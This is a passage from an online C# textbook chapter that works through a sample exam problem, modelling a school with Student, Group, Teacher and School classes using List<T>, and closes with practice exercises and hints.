its speed:\n\n 00:00:00.6540374\n\nIt runs really fast. This is the solution we needed and if we are allowed to use Internet at the exam, the best way to start when we have a standard well-known problem is to look for a well-known solution.\n\nProblem 3: School\n\nStudents, which are studying in a school, are separated into groups. Each of the groups has a teacher. The following information is kept for the students: first name and last name. The following information is kept for the groups: name, a list of students and teacher. The following information is kept for the teachers: first name, last name and a list of groups he is teaching. Each teacher can teach more than one group. The following information is kept for the school: name, list of the teachers, list of the groups and list of the students. Your task is to:\n\n1.  Design a set of classes and relationships between them to model the school, its students, teachers and groups.\n\n2.  
Implement functionality for add / edit / delete teachers, students, groups and their properties.\n\n3.  Implement functionality for printing in human-readable form the school, the teachers, the students, the groups and their properties.\n\n4.  Write a sample test program, which demonstrates the work of the implemented classes and methods.\n\nExample of school with teachers, students and groups:\n\n School \"Freedom\". Teachers: Tom Johnson, Elizabeth Hall. Group \"English\": David Russell, Nicholas Grant, Emma Fletcher, John Brown, Emily Cooper, teacher Elizabeth Hall. Group \"French\": Kevin Simmons, Ian Hayes, teacher Elizabeth Hall. Group \"Informatics\": Jessica Carter, Andrew Cooper, Ashley Moore, Olivia Adams, Jonathan Smith, teacher Tom Johnson.\n\nStart Thinking on the Problem\n\nThis is a good example of an exam assignment the purpose of which is to test your abilities to use object-oriented programming (OOP) for modeling problems from the real life, design classes and relationships between them as well as working with collections.\n\nAll we need to solve this problem is to use our object-oriented modeling skills that we have gained from chapter “Object-Oriented Programming Principles”, especially from the section “Object-Oriented Modeling (OOM)”.\n\nInventing an Idea for Solution\n\nIn this task there is nothing complex to invent. It is not algorithmic and there is not anything to be thought up. We must define a class for each of the described in the problem description objects (students, teachers, school students, groups, school, etc.) and after that we should define in each class properties to describe its characteristics and methods to implements the actions the class can do, e.g. printing in human-readable form. That’s all.\n\nFollowing the directions from the section “Object-Oriented Modeling (OOM)” we could identify the nouns in the problem description. Some of them should be modeled as classes; some of them as properties; and some of them may not be important and could be disregarded.\n\nReading the text from the problem description and analyzing the nouns, we could come to the idea to model the school through defining few interrelated classes: Student, Group, Teacher and School. For testing the classes we could create a class SchoolTest, which will create few objects of each class and will demonstrate their work in action.\n\nChecking the Idea\n\nWe will not check the idea because there is nothing to be proven or checked. We need to write few classes to model a real-world situation: a school with students, teachers and groups.\n\nDividing the Problem into Subproblems\n\nThe implementation of each of the classes we already identified can be considered a subproblem of the given school modeling problem. Thus we have the following subproblems:\n\n-     Class for the students – Student. Students will have first name, last name and a method for printing in human-readable form – ToString().\n\n-     Class for the groups – Group. Groups will have a name, a teacher and a list of students. It will also have а method for printing in human-readable form.\n\n-     Class for the teachers – Teacher. Teachers will have first name, last name and a list of groups, as well as а method for printing in human-readable form.\n\n-     Class for the school – School. It will have a name and will hold all students, all teachers and all groups.\n\n-     Class for testing the other classes – SchoolTest. 
It will create a school with a few students, a few groups holding subsets of the students and a few teachers. It will assign one teacher per group and a few groups per teacher accordingly. Finally the class will print the school and all its teachers, groups and students.

The data structures needed for this problem fall into two main groups: classes and relationships between the classes. The classes themselves raise no questions – we have nothing to decide there. The interesting part is how to describe the relationships between the classes, e.g. when a group holds a collection of students.

To describe a relationship (link) between two classes we can use an array. With an array we have access to its elements by index, but once it is created we cannot add or delete items (arrays have a fixed size). This makes arrays inconvenient for our problem, because we don’t know how many students we will have in the school, and students can be added or removed after the school is created.

List<T> seems more convenient. It has the advantages of an array and also has a variable length – it is easy to add or delete elements. List<T> can hold lists of students (inside the school and inside a group), lists of teachers (inside a school) and lists of groups (inside a school and inside a teacher).

So far it seems List<T> is the most appropriate structure for holding aggregations of objects inside another object. To be convinced, let’s analyze a few more data structures. A hash-table, for example, is not appropriate in this case, because the school, teachers, students and groups are not of a key-value nature. A hash-table would be appropriate if we needed to search for a student by a unique student ID, but this is not the case. Structures like stack and queue are inappropriate – we do not have LIFO or FIFO behavior.

The “set” structure and its implementation HashSet<T> may be used when we need uniqueness for a given key. It would sometimes be good to use this structure to avoid duplicates. We must recall that HashSet<T> requires the methods GetHashCode() and Equals(…) to be correctly defined by the type T. Shall we use sets, and where? To answer this question we need to recall the problem description. What does it say? We need to design a set of classes to model the school, its students, teachers and groups, and functionality to add / edit / delete teachers, students, groups and their properties. The easiest way to implement this is to hold a list of students in the school, a list of groups for each teacher, etc. Lists are easier to implement. Sets give uniqueness, but require Equals() and GetHashCode() and thus need more effort. So we may use lists to simplify our work.

According to the requirements the school should allow add / edit / delete of students, teachers and groups. The easiest way to implement this is to expose the lists of students, teachers and groups as public properties. List<T> already has methods for adding and deleting elements, and its elements are accessible by index and editable. It does the job.

Finally we choose to use List<T> for all aggregations in our classes and we will expose all the class members as properties with read and write access; a short usage sketch of what this enables is shown below.
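To illustrate, adding, editing and deleting then comes down to ordinary property access and List<T> calls. This is a hypothetical usage snippet, assuming the constructors and properties defined in the next steps:

 static void Main()
 {
     School school = new School("Freedom");
     Student maria = new Student("Maria", "Steward");
     school.Students.Add(maria);    // add
     maria.LastName = "Stewart";    // edit through a read-write property
     school.Students.Remove(maria); // delete
 }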
We do not have a good reason to restrict the access to the members or implement immutable behavior.\n\nImplementation: Step by Step\n\nIt’s appropriate to start the implementation with the class Student because it does not depend on any of the other classes.\n\nStep 1: Class Student\n\nIn the problem definition we have only two fields representing the first name and the last name of a student. We may add a property Name, which returns a string with the full name of the student and a ToString() implementation to print the student in human-readable form. We might define the class Student as follows:\n\n Student.cs public class Student {     public string FirstName { get; set; }     public string LastName { get; set; }       public Student(string firstName, string lastName)     {         this.FirstName = firstName;         this.LastName = lastName;     }       public string Name     {         get         {             return this.FirstName + \" \" + this.LastName;         }     }       public override string ToString()     {         return \"Student: \" + this.Name;     } }\n\nWe want to allow the class members to be editable so we define the FirstName and LastName as public read-write properties.\n\nTesting the Class Student\n\nBefore continuing forward we want to test the class Student to be sure it is correct. Let’s create a testing class with a Main() method and create a student in it and print the student:\n\n class TestSchool {     static void Main()     {         Student studentPeter = new Student(\"Peter\", \"Lee\");         Console.WriteLine(studentPeter);     } }\n\nWe run the testing program and we get a correct result:\n\n Student: Peter Lee\n\nNow we can continue with the implementation of the other classes.\n\nStep 2: Class Group\n\nThe next class we can define is Group. We choose it because the only one required for its definition is the class Student. The properties, which we will define, are the name of the group, a list of the students, which belong to the group, and a teacher who teaches the group. To implement the list with of the students we will use List<Student>. We will add a ToString() method to enable printing the group in a human-readable text form. Let’s see the implementation of the class Group:\n\n Group.cs using System.Collections.Generic;   public class Group {     public string Name { get; set; }     public List Students { get; set; }       public Group(string name)     {         this.Name = name;         this.Students = new List();     }       public override string ToString()     {         StringBuilder groupAsString = new StringBuilder();         groupAsString.AppendLine(\"Group name: \" + this.Name);         groupAsString.Append(\"Students in the group: \" +             this.Students);         return groupAsString.ToString();     } }\n\nIt is important when we create a group to assign an empty list of students to it. If we leave the list of students unassigned, it will be null and when we try to add a student, we will get an exception.\n\nTesting the Class Group\n\nLet’s now test the Group class. 
Let’s create a sample group, add few students to it and print the group at the console:\n\n static void Main() {     Student studentPeter = new Student(\"Peter\", \"Lee\");     Student studentMaria = new Student(\"Maria\", \"Steward\");     Group groupEnglish = new Group(\"English language course\");     groupEnglish.Students.Add(studentPeter);     groupEnglish.Students.Add(studentMaria);     Console.WriteLine(groupEnglish); }\n\nWe run the above testing code and we find a bug:\n\n Group name: English language course Students in the group: System.Collections.Generic.List`1[Student]\n\nIt seems like the list of students is printed incorrectly. It is easy to find why. The List<T> class does not correctly implement ToString() and we need to use another way to print a list of students. We can do this with a for-loop but let’s try something shorter and more elegant:\n\n using System.Linq; … groupAsString.Append(\"Students in the group: \" +     string.Join(\", \", this.Students.Select(s => s.Name)));\n\nThe above code uses an extension method and a lambda expression to select all students’ names as IEnumerable<string> and then combines them into a string using a comma as separator. Let’s test the Group class again after the fix:\n\n Group name: English language course Students in the group: Peter Lee, Maria Steward\n\nThe group class now works correctly.\n\nLet’s think a bit: who is teaching the students in the group? We should have a teacher, right. Let’s try to add the simplest possible class Teacher and define a property of it in the Group class:\n\n public class Teacher {     public string FirstName { get; set; }     public string LastName { get; set; }       public string Name     {         get         {             return this.FirstName + ' ' + this.LastName;         }     } }   public class Group {     public string Name { get; set; }     public List Students { get; set; }     public Teacher Teacher { get; set; }       public Group(string name)     {         this.Name = name;         this.Students = new List();     }       public override string ToString()     {         StringBuilder groupAsString = new StringBuilder();         groupAsString.AppendLine(\"Group name: \" + this.Name);         groupAsString.Append(\"Students in the group: \" +             string.Join(\", \", this.Students.Select(s => s.Name)));         groupAsString.Append(\"\\nGroup teacher: \" +             this.Teacher.Name);         return groupAsString.ToString();     } }\n\nLet’s test again with our sample groups of two students studying English:\n\n Student studentPeter = new Student(\"Peter\", \"Lee\"); Student studentMaria = new Student(\"Maria\", \"Steward\"); Group groupEnglish = new Group(\"English language course\"); groupEnglish.Students.Add(studentPeter); groupEnglish.Students.Add(studentMaria); Console.WriteLine(groupEnglish);\n\nWe find another bug:\n\n Unhandled Exception: System.NullReferenceException: Object reference not set to an instance of an object.    at Group.ToString() …\n\nWe step through the debugger and we see that we try to print the teacher’s name but there is no teacher (it is null). This is easy to fix. We could check whether the teacher exists prior to printing it in the ToString() method:\n\n if (this.Teacher != null) {     groupAsString.Append(\"\\nGroup teacher: \" +    this.Teacher.Name); }\n\nLet’s test again after the fix. 
Now we get the following correct result:\n\n Group name: English language course Students in the group: Peter Lee, Maria Steward\n\nLet’s now add a teacher to the testing group and check what happens:\n\n Student studentPeter = new Student(\"Peter\", \"Lee\"); Student studentMaria = new Student(\"Maria\", \"Steward\"); Group groupEnglish = new Group(\"English language course\"); groupEnglish.Students.Add(studentPeter); groupEnglish.Students.Add(studentMaria); Teacher teacherNatasha = new Teacher() {     FirstName = \"Natasha\", LastName = \"Walters\" }; groupEnglish.Teacher = teacherNatasha; Console.WriteLine(groupEnglish);\n\nThe result is correct:\n\n Group name: English language course Students in the group: Peter Lee, Maria Steward Group teacher: Natasha Walters\n\nNow the Group class works correctly. We can continue with the next class.\n\nStep 3: Class Teacher\n\nLet’s define the class Teacher. We already have some piece of it, but let’s define it in a better way. The teacher should have first name, last name and a list of group he teaches and should be printable in human-readable form. We can define it directly repeating the logic in the Group class:\n\n Teacher.cs public class Teacher {     public string FirstName { get; set; }     public string LastName { get; set; }     public List Groups { get; set; }       public Teacher(string firstName, string lastName)     {         this.FirstName = firstName;         this.LastName = lastName;         this.Groups = new List();     }       public string Name     {         get         {             return this.FirstName + \" \" + this.LastName;         }     }       public override string ToString()     {         StringBuilder teacherAsString = new StringBuilder();         teacherAsString.AppendLine(\"Teacher name: \" + this.Name);         teacherAsString.Append(\"Groups of this teacher: \" +             string.Join(\", \", this.Groups.Select(s => s.Name)));         return teacherAsString.ToString();     } }\n\nLike in the class Group, it is important to create and empty list of groups instead of leaving the Groups property uninitialized.\n\nTesting the Class Teacher\n\nBefore going further, let’s test the class Teacher. We can create a teacher with a few groups and print it at the console:\n\n static void Main() {     Teacher teacherNatasha = new Teacher(\"Natasha\", \"Walters\");     Group groupEnglish = new Group(\"English language\");     Group groupFrench= new Group(\"French language\");     teacherNatasha.Groups.Add(groupEnglish);     teacherNatasha.Groups.Add(groupFrench);     Console.WriteLine(teacherNatasha); }\n\nThe result is correct:\n\n Teacher name: Natasha Walters Groups of this teacher: English language, French language\n\nThis was expected. We just repeated the same logic like in the Group class which was already tested and all bugs in it was fixed. We found once again how important is to write the code step by step with testing and bug-fixing after each step, right? The bug with incorrectly printing the list of students would have been repeated when printing the list of groups, right?\n\nStep 4: Class School\n\nWe finish our object model with the definition of the class School, which uses all of the classes we already defined. 
It should have a name and should hold a list of students, a list of teachers and a list of groups:\n\n public class School {     public string Name { get; set; }     public List Teachers { get; set; }     public List Groups { get; set; }     public List Students { get; set; }       public School(string name)     {         this.Name = name;         this.Teachers = new List();         this.Groups = new List();         this.Students = new List();     } }\n\nBefore testing the class, let’s think what the class School is expected to do. It should hold the students, teachers and groups and should be printable at the console, right? If we print the school, what should be printed? Maybe we should print its name, all its students (with their inner details), all its teachers (with their inner details) and all its groups (with their inner details). Let’s try to define the ToString() method for the class School:\n\n public override string ToString() {     StringBuilder schoolAsString = new StringBuilder();     schoolAsString.AppendLine(\"School name: \" + this.Name);     schoolAsString.AppendLine(\"Teachers: \" +         string.Join(\", \", this.Teachers.Select(s => s.Name)));     schoolAsString.AppendLine(\"Students: \" +         string.Join(\", \", this.Students.Select(s => s.Name)));     schoolAsString.Append(\"Groups: \" +         string.Join(\", \", this.Groups.Select(s => s.Name)));     foreach (var teacher in this.Teachers)     {         schoolAsString.Append(\"\\n---\\n\");         schoolAsString.Append(teacher);     }     foreach (var group in this.Groups)     {         schoolAsString.Append(\"\\n---\\n\");         schoolAsString.Append(group);     }     foreach (var student in this.Students)     {         schoolAsString.Append(\"\\n---\\n\");         schoolAsString.Append(student);     }     return schoolAsString.ToString(); }\n\nWe shall not test the class School, because this will be the main purpose of our last class: SchoolTest.\n\nStep 5: Class SchoolTest\n\nThe final thing is the implementation of the class SchoolTest the purpose of which is to demonstrate all the classes we have defined (Student, Group, Teacher and School) and their methods and properties. This is our last subproblem. For the demonstration we create a sample school with a few students, a few teachers and a few groups and we print it:\n\nWe run the program and we get the expected result:\n\n School name: Saint George High School Teachers: Natasha Hudson, Steve Porter Students: Peter White, George Redwood, Maria Steward, Michael Robinson Groups: Advanced English, Java Programming course, HTML course --- Teacher name: Natasha Hudson Groups of this teacher: Advanced English, Java Programming course --- Teacher name: Steve Porter Groups of this teacher: HTML course --- Group name: Advanced English Students in the group: Michael Robinson, Maria Steward, George Redwood Group teacher: Natasha Hudson --- Group name: Java Programming course Students in the group: Maria Steward, Peter White Group teacher: Natasha Hudson --- Group name: HTML course Students in the group: Michael Robinson, Maria Steward Group teacher: Steve Porter --- Student: Peter White --- Student: George Redwood --- Student: Maria Steward --- Student: Michael Robinson\n\nOf course in real life programs do not start from the first time, but in this task the mistakes you could make are trivial so there’s no point in discussing them. All classes are implemented and tested. 
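The body of the SchoolTest class is not shown above. A version consistent with the printed output could look roughly like the sketch below (the exact test code in the original solution may differ in details):

 using System;

 public class SchoolTest
 {
     static void Main()
     {
         // Create a few students
         Student peter = new Student("Peter", "White");
         Student george = new Student("George", "Redwood");
         Student maria = new Student("Maria", "Steward");
         Student michael = new Student("Michael", "Robinson");

         // Create a few teachers
         Teacher natasha = new Teacher("Natasha", "Hudson");
         Teacher steve = new Teacher("Steve", "Porter");

         // Create a few groups and assign their students and teachers
         Group english = new Group("Advanced English");
         english.Students.Add(michael);
         english.Students.Add(maria);
         english.Students.Add(george);
         english.Teacher = natasha;

         Group java = new Group("Java Programming course");
         java.Students.Add(maria);
         java.Students.Add(peter);
         java.Teacher = natasha;

         Group html = new Group("HTML course");
         html.Students.Add(michael);
         html.Students.Add(maria);
         html.Teacher = steve;

         natasha.Groups.Add(english);
         natasha.Groups.Add(java);
         steve.Groups.Add(html);

         // Create the school and register everything in it
         School school = new School("Saint George High School");
         school.Teachers.Add(natasha);
         school.Teachers.Add(steve);
         school.Students.Add(peter);
         school.Students.Add(george);
         school.Students.Add(maria);
         school.Students.Add(michael);
         school.Groups.Add(english);
         school.Groups.Add(java);
         school.Groups.Add(html);

         // Print the school with all its teachers, groups and students
         Console.WriteLine(school);
     }
 }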
We are almost finished with this problem.\n\nTesting the Solution\n\nAs usually, it remains to test if the entire solution is working correctly. We’ve already done this. We tested all the classes in their nominal case.\n\nWe can do some tests with the border cases, for instance a group without students, empty school, etc. It seems like these cases work correctly. We might test a student without a name, but it is unclear whether the class should keep itself of incorrect names and what is a correct name. We can leave these classes without checks for the names. It will be a responsibility of their caller to put correct names though their constructors and properties. The problem description says nothing about this.\n\nIt is interesting how we delete a student. In our current implementation, if we delete a student, we will need to remove it from the school and to remove it from all groups he belongs to. The removal itself will require the student to have the Equals() method defined correctly or we should compare students by hand (property by property). It is unclear from the problem description how exactly the “delete student” operation should work.\n\nWe assume we don’t have time and we submit the solution in its current state without efficient delete operation. Sometimes it takes too much time to fix something and it is better to leave it in not perfect form. Below is the full source code of the solution of the school modeling problem:\n\nWe will not run performance tests because the task is not of a computational nature which requires a fast algorithm. Operations that could be slow are deleting of elements from a collection. Creating objects, assigning their properties and adding elements to their collections of child elements are all fast operations. Only the deletion could be slow. We could improve its performance by using HashSet<T> instead of List<T> in all aggregations. We leave this to the reader.\n\nLet’s make just one more note. Why we did not notice the performance problem with deleting elements earlier? Let’s recall how we proceeded with solving this problem. After thinking about the data structures we had to thing about the performance right? Did we do this step? We omitted this step and we found the problem too late. The conclusion is: follow the guidelines for problem solving. They are very wise.\n\n1.     Write a program, which prints a square spiral matrix beginning from the number 1 in the upper right corner and moving clockwise. Examples for N=3 and N=4:\n\n2.     Write a program, which counts the phrases in a text file. Any sequence of characters could be given as phrase for counting, even sequences containing separators. For instance in the text \"I am a student in Sofia\" the phrases \"s\", \"stu\", \"a\" and \"I am\" are found respectively 2, 1, 3 and 1 times.\n\n3.     Model with OOP the file system of a computer running Windows. We have devices, directories and files. The devices are for instance floppy disk, HDD, CD-ROM, etc. They have a name and a tree of directories and files. Each directory has a name, date of last change and list of files and directories, which it holds. Each file has a name, date of creation, date of last change and content. Each file is placed in one of the directories. Each file can be text or binary. Text files contain text (string), and the binary ones – sequence of bytes (byte[]). Create a class, which tests the other classes and demonstrates how we can build a model for devices, directories and files in the computer.\n\n4.     
Using the classes from the previous task write a program which takes the real file system from your computer and loads it in your classes (just the names of the devices, directories and files, without the content of the files because you will run out of memory).\n\n1.     The task is analogical to the first task of the sample exam. You can modify the sample solution given above.\n\n2.     You may read the text char by char and after each char to append it to the current buffer buf and check each of the searched word for a match with EndsWith() in the buffer’s end. Of course you cannot use efficiently hash-table and you will have a loop for each letter from the text, which is not the fastest solution. This is a modification of the “char by char algorithm for word counting”.\n\nImplementing a faster solution needs to adapt the Aho-Corasick algorithm. Try to play with it and modify the code from the section “Counting Substrings with the Aho-Corasick Algorithm”.\n\n3.     The problem is analogical with the “School” problem from the sample exam and it can be solved by using the same approach. Define classes Device, Directory, File, ComputerStorage and ComputerStorageTest. Think of what properties each of these classes has and what are the relationships between the classes. Create a base abstract class File and inherit it from TextFile and BinaryFile. Test your code with sample hierarchy of devices, files and folders. Note: a file can be listed in more than one directory at the same time (unlike in the file system).\n\n4.     Use the class System.IO.Directory and its static methods GetFiles(), GetDirectories() and GetLogicalDrives(). Traverse the files system using the BFS or DFS graph traversal algorithm. Load partially the content of long files (e.g. the first 128 bytes / chars) to save memory.\n\n## Discussion Forum\n\nComment the book and the tasks in the : forum of the Software Academy.\n\n### One response to “Chapter 26. Sample Programming Exam – Topic #3”\n\n1. […] Chapter 26. Sample Programming Exam – Topic #3 […]\n\nThis site uses Akismet to reduce spam. Learn how your comment data is processed." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8636002,"math_prob":0.84510624,"size":77208,"snap":"2019-43-2019-47","text_gpt3_token_len":17267,"char_repetition_ratio":0.15337288,"word_repetition_ratio":0.22364166,"special_character_ratio":0.23577867,"punctuation_ratio":0.14565657,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9541921,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-11-20T01:45:22Z\",\"WARC-Record-ID\":\"<urn:uuid:542bd349-0804-4727-bd42-c1adcc007be6>\",\"Content-Length\":\"845571\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:069e7c33-d555-4fe8-be55-5dbc0e22db0e>\",\"WARC-Concurrent-To\":\"<urn:uuid:cc629954-5fbf-4687-86cc-bfe73533eb93>\",\"WARC-IP-Address\":\"164.138.217.83\",\"WARC-Target-URI\":\"https://introprogramming.info/english-intro-csharp-book/read-online/chapter-26-sample-programming-exam-topic-3/\",\"WARC-Payload-Digest\":\"sha1:3SXEHNDTDT4D5FKKI6NSTEFZQ267VAIY\",\"WARC-Block-Digest\":\"sha1:QK6ONHIP4EXIYF2GMCP3S3QFSMEKOYVJ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-47/CC-MAIN-2019-47_segments_1573496670389.25_warc_CC-MAIN-20191120010059-20191120034059-00343.warc.gz\"}"}
https://entercad.ru/acad_aag.en/ws1a9193826455f5ff1a32d8d10ebc6b7ccc-6b59.htm
[ "You can draw dimensions in both paper space and model space. However, if the geometry you're dimensioning is in model space, it's better to draw dimensions in model space, because AutoCAD places the definition points in the space where the geometry is drawn.\n\nIf you draw a dimension in paper space that describes geometry in your model, the paper space dimension does not change when you use editing commands or change the magnification of the display in the model space viewport. The location of the paper space dimensions also stays the same when you change a view from paper space to model space.\n\nIf you're dimensioning in paper space and the global scale factor for linear dimensioning (the DIMLFAC system variable) is set at less than 0, the distance measured is multiplied by the absolute value of DIMLFAC. If you're dimensioning in model space, the value of 1.0 is used even if DIMLFAC is less than 0. AutoCAD computes a value for DIMLFAC if you change the variable at the Dim prompt and select the Viewport option. AutoCAD calculates the scaling of model space to paper space and assigns the negative of this value to DIMLFAC." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.89463484,"math_prob":0.9870413,"size":1134,"snap":"2021-43-2021-49","text_gpt3_token_len":240,"char_repetition_ratio":0.1938053,"word_repetition_ratio":0.0,"special_character_ratio":0.19400352,"punctuation_ratio":0.070754714,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9910079,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-10-18T13:19:55Z\",\"WARC-Record-ID\":\"<urn:uuid:e642250d-d088-4411-8fa5-99f07c848e44>\",\"Content-Length\":\"11959\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:45b87946-87cd-493a-b158-9540d37b4b73>\",\"WARC-Concurrent-To\":\"<urn:uuid:c1952c5d-885b-480b-95e6-b92e0a43d136>\",\"WARC-IP-Address\":\"45.89.69.168\",\"WARC-Target-URI\":\"https://entercad.ru/acad_aag.en/ws1a9193826455f5ff1a32d8d10ebc6b7ccc-6b59.htm\",\"WARC-Payload-Digest\":\"sha1:WQIMU4MZKZKLSFG7Z4UNBN53W7LU6W66\",\"WARC-Block-Digest\":\"sha1:J4KAIG5B7VMB45ZBK4SUX3AJ5SII2THB\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-43/CC-MAIN-2021-43_segments_1634323585203.61_warc_CC-MAIN-20211018124412-20211018154412-00380.warc.gz\"}"}
https://davidwees.com/content/do-these-glasses-end-same-amount-each-type-soda/
[ "Education ∪ Math ∪ Technology\n\nFirst watch this short video created by Dan Meyer so you understand the problem.\n\nI was having trouble wrapping my head around this problem. I saw people’s algebraic proofs, and I just felt there was something wrong with them. So I decided to construct a geomtric proof instead to make it more clear in my head.", null, "At step 1, both glasses have the same amount of liquid. At step 2, one glass has some liquid poured into the other glass. At step 3, we pour out the same amount of liquid from the right most glass, hence the area of the red rectangle is equal to the area of the vertical rectangle with the mixture of the two types of soda. Note that I’ve made sure to go the other direction in the diagram, so as to represent the fact that assuming the two liquids are mixed equally, essentially the soda I pour back is a mixture. In step 4, I note that area A + B is the same as B + C, because the two liquids are the same, and that the area of B is the same in both pictures, and so hence the area of A is the same as the area of C, which means that the amount of the first soda moved back and forth is the same." ]
[ null, "https://davidwees.com/sites/default/files/Geometric%20proof_0.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.94909036,"math_prob":0.9384182,"size":1707,"snap":"2021-43-2021-49","text_gpt3_token_len":419,"char_repetition_ratio":0.13388139,"word_repetition_ratio":0.0,"special_character_ratio":0.24194494,"punctuation_ratio":0.103174604,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97509587,"pos_list":[0,1,2],"im_url_duplicate_count":[null,6,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-12-03T13:46:08Z\",\"WARC-Record-ID\":\"<urn:uuid:9191c4e8-e6ef-4932-801d-dc4d34bf3ec3>\",\"Content-Length\":\"56732\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:7dc8f157-f0b2-4fe4-ad2c-1356218d6541>\",\"WARC-Concurrent-To\":\"<urn:uuid:89d0d75d-9e7f-422b-ba25-3319fe656cb5>\",\"WARC-IP-Address\":\"173.236.245.26\",\"WARC-Target-URI\":\"https://davidwees.com/content/do-these-glasses-end-same-amount-each-type-soda/\",\"WARC-Payload-Digest\":\"sha1:JDED4KSFTQGFZ6324SZ7WLJKNXIPKUOU\",\"WARC-Block-Digest\":\"sha1:LP27AT7B5FVNOJR67G5OY6TRN6PHUY3K\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-49/CC-MAIN-2021-49_segments_1637964362879.45_warc_CC-MAIN-20211203121459-20211203151459-00594.warc.gz\"}"}
https://educatingnow.com/parents/
[ "# » Parents\n\n### Play games such as:\n\n1. Any board game that uses dice and cards\n2. Dot card and 10 frame games and activities\n3. Set\n4. Tangos\n5. ‘Make 10 Go Fish’\n6. Mastermind\n7. Dominoes\n8. Mancala\n9. Chess/Checkers\n10. Cribbage\n11. Yahtzee\n1. Cribbage\n2. Yahtzee\n3. Set\n4. Tangos\n5. Mastermind\n6. Dominoes\n7. Mancala\n8. Chess/Checkers\n9. For younger students: anything with Dice and cards (Snakes and Ladders, board games, card games –‘ Make 10 Go Fish’)\n\n### Strike It Out\n\nPower of 10 (partitioning): knowing the pairs of numbers that add to make 10 to partition numbers. Examples: 7+4 = 7+3+1 = 10+1= 11 or 8+5 = 8+2+3=10+3=13\n\nNear Doubles: once students know their doubles this can be used to find near doubles. Examples: 7+8 = 7+7+1 = 14+1 = 15 or 6+7 = 6+6+1=12+1=13\n\nAdding 9: we want students to see that adding 9 is the same as adding 10, subtract 1. Example: 9+6 = 10+6-1 = 16-1 = 15 or 9+8 = 10+8-1=18-1=17\n\nPartitioning into place value: this also reinforces the universal “rule” to adding any numbers (whole numbers, decimals, fractions, variables) that you add “like terms”. Example: 324+68 à 300 + (20+60) + (4+8) = 300+80+12 = 392\n\n## Subtraction Strategies\n\nSubtract 9: is just like subtracting 10 +1. Connect this to adding 9. Example: 13-9 = 13-10+1 = 3+1 = 4\n\nSubtract 8: subtract 10 +2. Example: 12-8 = 12-10+2 = 2+2 = 4\n\nPower of 10 or partitioning: break up the numbers to make it a multiple of 10. Example: 13-5 = 13-3-2 = 10-2=8.\n\nThink of it as addition and count up. Example: 14-6 = 6 + ? = 14 àthen they could do 6 + 4=10 + 4 =14 so ? = 8. This strategy can be very useful for larger number subtractions.\n\n## Multiplication Strategies\n\nFor meaning: use arrays, area models, manipulatives and “GROUPS OF” (if they can’t give you a story problem that would use multiplication it means they likely don’t have conceptual understanding)\n\nMost students find the 0,1,2,5,10 multiplication facts easier to learn, and so use strategies based on what they know. Using strategies builds number sense and are good pre-algebra thinking activities for students.\n\n3’s: double a number and add another group (if they have become proficient at adding, this will be easier for them). Example: 3 x 7 = 2 x 7 +7= 14 + 7 = 21\n\n4’s: double twice. Example: 4 x 8 = 2 x 8 x 2 = 16 x 2 = 32\n\n6’s: double the 3’s. Example: 6 x 6 = 3 x 6 x 2= 18 x 2 = 36\n\nOR  do the # x5 + another group of the #.  Example: 6 x 6 = 5 x 6 = 30 + 6 = 36\n\n7’s:  do the #x5 + the # x2. Example: 7 x 8 = 5 x 8 + 2 x 8 = 40+16 = 56\n\n8’s: double three times. Example: 8 x 8 = 8 x 2 x 2 x 2= 16 x 2 x 2 = 32 x 2 = 64\n\nOR double the 4’s if they know them. Example:  8 x 6 = 4 x 6 x 2 = 24 x 2 = 48\n\nOR “jump off” what they know by adding or subtracting groups. Example: 8 x 7 (if the student\n\nknew 7 x7 = 49, then they can add another group of 7 = 56)\n\n9’s: multiply by 10 and then subtract one group of the number. Example: 9 x 7 = 70-7 = 63\n\nOR use the knowledge that the digits will always add to 9, the pattern of tens and ones\n\n11’s: Pattern found up to 9 x 11. Example: 11 x 4 = 44\n\nOR Multiply by 10 and add another group. Example:  11 x 7 = 10 x 7 + 7 = 70+7=77\n\n12’s: do 10 x the # +2 x the number. Example: 12 x 7 = 10 x 7 + 2 x 7 = 70+14=84\n\nOR add another group to 11’s. 
Example: 12 x 8 = 11 x8 + 8 = 88+8 = 96\n\n## Multi-Digit Multiplication Strategies\n\nUse box method or Area Model, distributive property, traditional with meaning (multiplying numbers not digits, so no “carrying over”).  All of these methods will have future applications like multiplying binomials. Examples:\n\n## Division strategies\n\nMost students find it easiest to think about as the opposite of multiplication.\n\nFor meaning: use arrays, area models, manipulatives and explore both equal sharing and equal grouping and how they are similar and different.\n\nEqual Sharing: 12÷4 = 3 means 12 divided into 4 equal groups = 3 in each group:\n\nMulti-Digit Division:\n\nRepeated subtraction or Partial Quotient method for multi-digit division can be a welcome strategy to use rather than the traditional long division algorithm:\n\nLong division algorithm with meaning: 2 Options:", null, "In today’s post we will be exploring how to connect reading to math, math in the home, and math out ...", null, "Most adults use estimation and calculators to do their daily math, rarely do they get out a piece of paper ...", null, "I saved the best for last! Who doesn’t love playing games?! This last post for parents on how to support ...\n\n## Tips for supporting your child at home:\n\nAvoid endorsing math anxiety or being “bad at math”. Students who have these attitudes towards math have more difficulties learning math than those who approach it positively. This is the “growth mindset” versus “fixed mindset” and has been proven to really affect learning. Another way to encourage a Growth Mindset is to encourage perseverance through frustration and understanding that mistakes actually make the brain grow – so are not bad but rather are very useful for developing understanding.\n\nMath is literally all around us….if we 